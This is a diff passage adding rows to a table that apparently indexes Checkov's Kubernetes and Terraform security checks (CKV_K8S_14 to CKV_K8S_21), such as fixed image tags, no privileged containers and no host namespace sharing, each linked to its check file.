+| 2771 | CKV_K8S_14               | resource                         | Pod                                                                                              | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Kubernetes              | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py)                                                                                                    |
+| 2772 | CKV_K8S_14               | resource                         | PodTemplate                                                                                      | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Kubernetes              | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py)                                                                                                    |
+| 2773 | CKV_K8S_14               | resource                         | ReplicaSet                                                                                       | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Kubernetes              | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py)                                                                                                    |
+| 2774 | CKV_K8S_14               | resource                         | ReplicationController                                                                            | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Kubernetes              | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py)                                                                                                    |
+| 2775 | CKV_K8S_14               | resource                         | StatefulSet                                                                                      | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Kubernetes              | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py)                                                                                                    |
+| 2776 | CKV_K8S_14               | resource                         | kubernetes_deployment                                                                            | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Terraform               | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py)                                                                                              |
+| 2777 | CKV_K8S_14               | resource                         | kubernetes_deployment_v1                                                                         | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Terraform               | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py)                                                                                              |
+| 2778 | CKV_K8S_14               | resource                         | kubernetes_pod                                                                                   | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Terraform               | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py)                                                                                              |
+| 2779 | CKV_K8S_14               | resource                         | kubernetes_pod_v1                                                                                | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Terraform               | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py)                                                                                              |
+| 2780 | CKV_K8S_15               | resource                         | CronJob                                                                                          | Image Pull Policy should be Always                                                                                                                                                                       | Kubernetes              | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py)                                                                                    |
+| 2781 | CKV_K8S_15               | resource                         | DaemonSet                                                                                        | Image Pull Policy should be Always                                                                                                                                                                       | Kubernetes              | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py)                                                                                    |
+| 2782 | CKV_K8S_15               | resource                         | Deployment                                                                                       | Image Pull Policy should be Always                                                                                                                                                                       | Kubernetes              | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py)                                                                                    |
+| 2783 | CKV_K8S_15               | resource                         | DeploymentConfig                                                                                 | Image Pull Policy should be Always                                                                                                                                                                       | Kubernetes              | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py)                                                                                    |
+| 2784 | CKV_K8S_15               | resource                         | Job                                                                                              | Image Pull Policy should be Always                                                                                                                                                                       | Kubernetes              | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py)                                                                                    |
+| 2785 | CKV_K8S_15               | resource                         | Pod                                                                                              | Image Pull Policy should be Always                                                                                                                                                                       | Kubernetes              | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py)                                                                                    |
+| 2786 | CKV_K8S_15               | resource                         | PodTemplate                                                                                      | Image Pull Policy should be Always                                                                                                                                                                       | Kubernetes              | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py)                                                                                    |
+| 2787 | CKV_K8S_15               | resource                         | ReplicaSet                                                                                       | Image Pull Policy should be Always                                                                                                                                                                       | Kubernetes              | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py)                                                                                    |
+| 2788 | CKV_K8S_15               | resource                         | ReplicationController                                                                            | Image Pull Policy should be Always                                                                                                                                                                       | Kubernetes              | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py)                                                                                    |
+| 2789 | CKV_K8S_15               | resource                         | StatefulSet                                                                                      | Image Pull Policy should be Always                                                                                                                                                                       | Kubernetes              | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py)                                                                                    |
+| 2790 | CKV_K8S_15               | resource                         | kubernetes_deployment                                                                            | Image Pull Policy should be Always                                                                                                                                                                       | Terraform               | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py)                                                                              |
+| 2791 | CKV_K8S_15               | resource                         | kubernetes_deployment_v1                                                                         | Image Pull Policy should be Always                                                                                                                                                                       | Terraform               | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py)                                                                              |
+| 2792 | CKV_K8S_15               | resource                         | kubernetes_pod                                                                                   | Image Pull Policy should be Always                                                                                                                                                                       | Terraform               | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py)                                                                              |
+| 2793 | CKV_K8S_15               | resource                         | kubernetes_pod_v1                                                                                | Image Pull Policy should be Always                                                                                                                                                                       | Terraform               | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py)                                                                              |
+| 2794 | CKV_K8S_16               | resource                         | CronJob                                                                                          | Container should not be privileged                                                                                                                                                                       | Kubernetes              | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py)                                                                                      |
+| 2795 | CKV_K8S_16               | resource                         | DaemonSet                                                                                        | Container should not be privileged                                                                                                                                                                       | Kubernetes              | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py)                                                                                      |
+| 2796 | CKV_K8S_16               | resource                         | Deployment                                                                                       | Container should not be privileged                                                                                                                                                                       | Kubernetes              | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py)                                                                                      |
+| 2797 | CKV_K8S_16               | resource                         | DeploymentConfig                                                                                 | Container should not be privileged                                                                                                                                                                       | Kubernetes              | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py)                                                                                      |
+| 2798 | CKV_K8S_16               | resource                         | Job                                                                                              | Container should not be privileged                                                                                                                                                                       | Kubernetes              | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py)                                                                                      |
+| 2799 | CKV_K8S_16               | resource                         | Pod                                                                                              | Container should not be privileged                                                                                                                                                                       | Kubernetes              | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py)                                                                                      |
+| 2800 | CKV_K8S_16               | resource                         | PodTemplate                                                                                      | Container should not be privileged                                                                                                                                                                       | Kubernetes              | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py)                                                                                      |
+| 2801 | CKV_K8S_16               | resource                         | ReplicaSet                                                                                       | Container should not be privileged                                                                                                                                                                       | Kubernetes              | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py)                                                                                      |
+| 2802 | CKV_K8S_16               | resource                         | ReplicationController                                                                            | Container should not be privileged                                                                                                                                                                       | Kubernetes              | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py)                                                                                      |
+| 2803 | CKV_K8S_16               | resource                         | StatefulSet                                                                                      | Container should not be privileged                                                                                                                                                                       | Kubernetes              | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py)                                                                                      |
+| 2804 | CKV_K8S_16               | resource                         | kubernetes_deployment                                                                            | Do not admit privileged containers                                                                                                                                                                       | Terraform               | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py)                                                                                  |
+| 2805 | CKV_K8S_16               | resource                         | kubernetes_deployment_v1                                                                         | Do not admit privileged containers                                                                                                                                                                       | Terraform               | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py)                                                                                  |
+| 2806 | CKV_K8S_16               | resource                         | kubernetes_pod                                                                                   | Do not admit privileged containers                                                                                                                                                                       | Terraform               | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py)                                                                                  |
+| 2807 | CKV_K8S_16               | resource                         | kubernetes_pod_v1                                                                                | Do not admit privileged containers                                                                                                                                                                       | Terraform               | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py)                                                                                  |
+| 2808 | CKV_K8S_17               | resource                         | CronJob                                                                                          | Containers should not share the host process ID namespace                                                                                                                                                | Kubernetes              | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py)                                                                                                      |
+| 2809 | CKV_K8S_17               | resource                         | DaemonSet                                                                                        | Containers should not share the host process ID namespace                                                                                                                                                | Kubernetes              | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py)                                                                                                      |
+| 2810 | CKV_K8S_17               | resource                         | Deployment                                                                                       | Containers should not share the host process ID namespace                                                                                                                                                | Kubernetes              | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py)                                                                                                      |
+| 2811 | CKV_K8S_17               | resource                         | Job                                                                                              | Containers should not share the host process ID namespace                                                                                                                                                | Kubernetes              | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py)                                                                                                      |
+| 2812 | CKV_K8S_17               | resource                         | Pod                                                                                              | Containers should not share the host process ID namespace                                                                                                                                                | Kubernetes              | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py)                                                                                                      |
+| 2813 | CKV_K8S_17               | resource                         | ReplicaSet                                                                                       | Containers should not share the host process ID namespace                                                                                                                                                | Kubernetes              | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py)                                                                                                      |
+| 2814 | CKV_K8S_17               | resource                         | ReplicationController                                                                            | Containers should not share the host process ID namespace                                                                                                                                                | Kubernetes              | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py)                                                                                                      |
+| 2815 | CKV_K8S_17               | resource                         | StatefulSet                                                                                      | Containers should not share the host process ID namespace                                                                                                                                                | Kubernetes              | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py)                                                                                                      |
+| 2816 | CKV_K8S_17               | resource                         | kubernetes_deployment                                                                            | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Terraform               | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py)                                                                                                |
+| 2817 | CKV_K8S_17               | resource                         | kubernetes_deployment_v1                                                                         | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Terraform               | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py)                                                                                                |
+| 2818 | CKV_K8S_17               | resource                         | kubernetes_pod                                                                                   | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Terraform               | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py)                                                                                                |
+| 2819 | CKV_K8S_17               | resource                         | kubernetes_pod_v1                                                                                | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Terraform               | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py)                                                                                                |
+| 2820 | CKV_K8S_18               | resource                         | CronJob                                                                                          | Containers should not share the host IPC namespace                                                                                                                                                       | Kubernetes              | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py)                                                                                                      |
+| 2821 | CKV_K8S_18               | resource                         | DaemonSet                                                                                        | Containers should not share the host IPC namespace                                                                                                                                                       | Kubernetes              | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py)                                                                                                      |
+| 2822 | CKV_K8S_18               | resource                         | Deployment                                                                                       | Containers should not share the host IPC namespace                                                                                                                                                       | Kubernetes              | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py)                                                                                                      |
+| 2823 | CKV_K8S_18               | resource                         | Job                                                                                              | Containers should not share the host IPC namespace                                                                                                                                                       | Kubernetes              | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py)                                                                                                      |
+| 2824 | CKV_K8S_18               | resource                         | Pod                                                                                              | Containers should not share the host IPC namespace                                                                                                                                                       | Kubernetes              | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py)                                                                                                      |
+| 2825 | CKV_K8S_18               | resource                         | ReplicaSet                                                                                       | Containers should not share the host IPC namespace                                                                                                                                                       | Kubernetes              | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py)                                                                                                      |
+| 2826 | CKV_K8S_18               | resource                         | ReplicationController                                                                            | Containers should not share the host IPC namespace                                                                                                                                                       | Kubernetes              | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py)                                                                                                      |
+| 2827 | CKV_K8S_18               | resource                         | StatefulSet                                                                                      | Containers should not share the host IPC namespace                                                                                                                                                       | Kubernetes              | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py)                                                                                                      |
+| 2828 | CKV_K8S_18               | resource                         | kubernetes_deployment                                                                            | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Terraform               | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py)                                                                                                |
+| 2829 | CKV_K8S_18               | resource                         | kubernetes_deployment_v1                                                                         | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Terraform               | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py)                                                                                                |
+| 2830 | CKV_K8S_18               | resource                         | kubernetes_pod                                                                                   | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Terraform               | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py)                                                                                                |
+| 2831 | CKV_K8S_18               | resource                         | kubernetes_pod_v1                                                                                | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Terraform               | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py)                                                                                                |
+| 2832 | CKV_K8S_19               | resource                         | CronJob                                                                                          | Containers should not share the host network namespace                                                                                                                                                   | Kubernetes              | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py)                                                                          |
+| 2833 | CKV_K8S_19               | resource                         | DaemonSet                                                                                        | Containers should not share the host network namespace                                                                                                                                                   | Kubernetes              | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py)                                                                          |
+| 2834 | CKV_K8S_19               | resource                         | Deployment                                                                                       | Containers should not share the host network namespace                                                                                                                                                   | Kubernetes              | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py)                                                                          |
+| 2835 | CKV_K8S_19               | resource                         | Job                                                                                              | Containers should not share the host network namespace                                                                                                                                                   | Kubernetes              | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py)                                                                          |
+| 2836 | CKV_K8S_19               | resource                         | Pod                                                                                              | Containers should not share the host network namespace                                                                                                                                                   | Kubernetes              | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py)                                                                          |
+| 2837 | CKV_K8S_19               | resource                         | ReplicaSet                                                                                       | Containers should not share the host network namespace                                                                                                                                                   | Kubernetes              | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py)                                                                          |
+| 2838 | CKV_K8S_19               | resource                         | ReplicationController                                                                            | Containers should not share the host network namespace                                                                                                                                                   | Kubernetes              | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py)                                                                          |
+| 2839 | CKV_K8S_19               | resource                         | StatefulSet                                                                                      | Containers should not share the host network namespace                                                                                                                                                   | Kubernetes              | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py)                                                                          |
+| 2840 | CKV_K8S_19               | resource                         | kubernetes_deployment                                                                            | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Terraform               | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py)                                                                    |
+| 2841 | CKV_K8S_19               | resource                         | kubernetes_deployment_v1                                                                         | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Terraform               | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py)                                                                    |
+| 2842 | CKV_K8S_19               | resource                         | kubernetes_pod                                                                                   | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Terraform               | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py)                                                                    |
+| 2843 | CKV_K8S_19               | resource                         | kubernetes_pod_v1                                                                                | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Terraform               | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py)                                                                    |
+| 2844 | CKV_K8S_20               | resource                         | CronJob                                                                                          | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py)                                                                              |
+| 2845 | CKV_K8S_20               | resource                         | DaemonSet                                                                                        | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py)                                                                              |
+| 2846 | CKV_K8S_20               | resource                         | Deployment                                                                                       | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py)                                                                              |
+| 2847 | CKV_K8S_20               | resource                         | DeploymentConfig                                                                                 | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py)                                                                              |
+| 2848 | CKV_K8S_20               | resource                         | Job                                                                                              | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py)                                                                              |
+| 2849 | CKV_K8S_20               | resource                         | Pod                                                                                              | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py)                                                                              |
+| 2850 | CKV_K8S_20               | resource                         | PodTemplate                                                                                      | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py)                                                                              |
+| 2851 | CKV_K8S_20               | resource                         | ReplicaSet                                                                                       | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py)                                                                              |
+| 2852 | CKV_K8S_20               | resource                         | ReplicationController                                                                            | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py)                                                                              |
+| 2853 | CKV_K8S_20               | resource                         | StatefulSet                                                                                      | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py)                                                                              |
+| 2854 | CKV_K8S_20               | resource                         | kubernetes_deployment                                                                            | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Terraform               | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py)                                                                        |
+| 2855 | CKV_K8S_20               | resource                         | kubernetes_deployment_v1                                                                         | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Terraform               | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py)                                                                        |
+| 2856 | CKV_K8S_20               | resource                         | kubernetes_pod                                                                                   | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Terraform               | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py)                                                                        |
+| 2857 | CKV_K8S_20               | resource                         | kubernetes_pod_v1                                                                                | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Terraform               | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py)                                                                        |
+| 2858 | CKV_K8S_21               | resource                         | ConfigMap                                                                                        | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                              |
+| 2859 | CKV_K8S_21               | resource                         | CronJob                                                                                          | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                              |
+| 2860 | CKV_K8S_21               | resource                         | DaemonSet                                                                                        | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                              |
+| 2861 | CKV_K8S_21               | resource                         | Deployment                                                                                       | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                              |
+| 2862 | CKV_K8S_21               | resource                         | Ingress                                                                                          | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                              |
+| 2863 | CKV_K8S_21               | resource                         | Job                                                                                              | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                              |
+| 2864 | CKV_K8S_21               | resource                         | Pod                                                                                              | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                              |
+| 2865 | CKV_K8S_21               | resource                         | ReplicaSet                                                                                       | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                              |
+| 2866 | CKV_K8S_21               | resource                         | ReplicationController                                                                            | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                              |
+| 2867 | CKV_K8S_21               | resource                         | Role                                                                                             | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                              |
+| 2868 | CKV_K8S_21               | resource                         | RoleBinding                                                                                      | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                              |
+| 2869 | CKV_K8S_21               | resource                         | Secret                                                                                           | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                              |
+| 2870 | CKV_K8S_21               | resource                         | Service                                                                                          | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                              |
+| 2871 | CKV_K8S_21               | resource                         | ServiceAccount                                                                                   | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                              |
+| 2872 | CKV_K8S_21               | resource                         | StatefulSet                                                                                      | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                              |
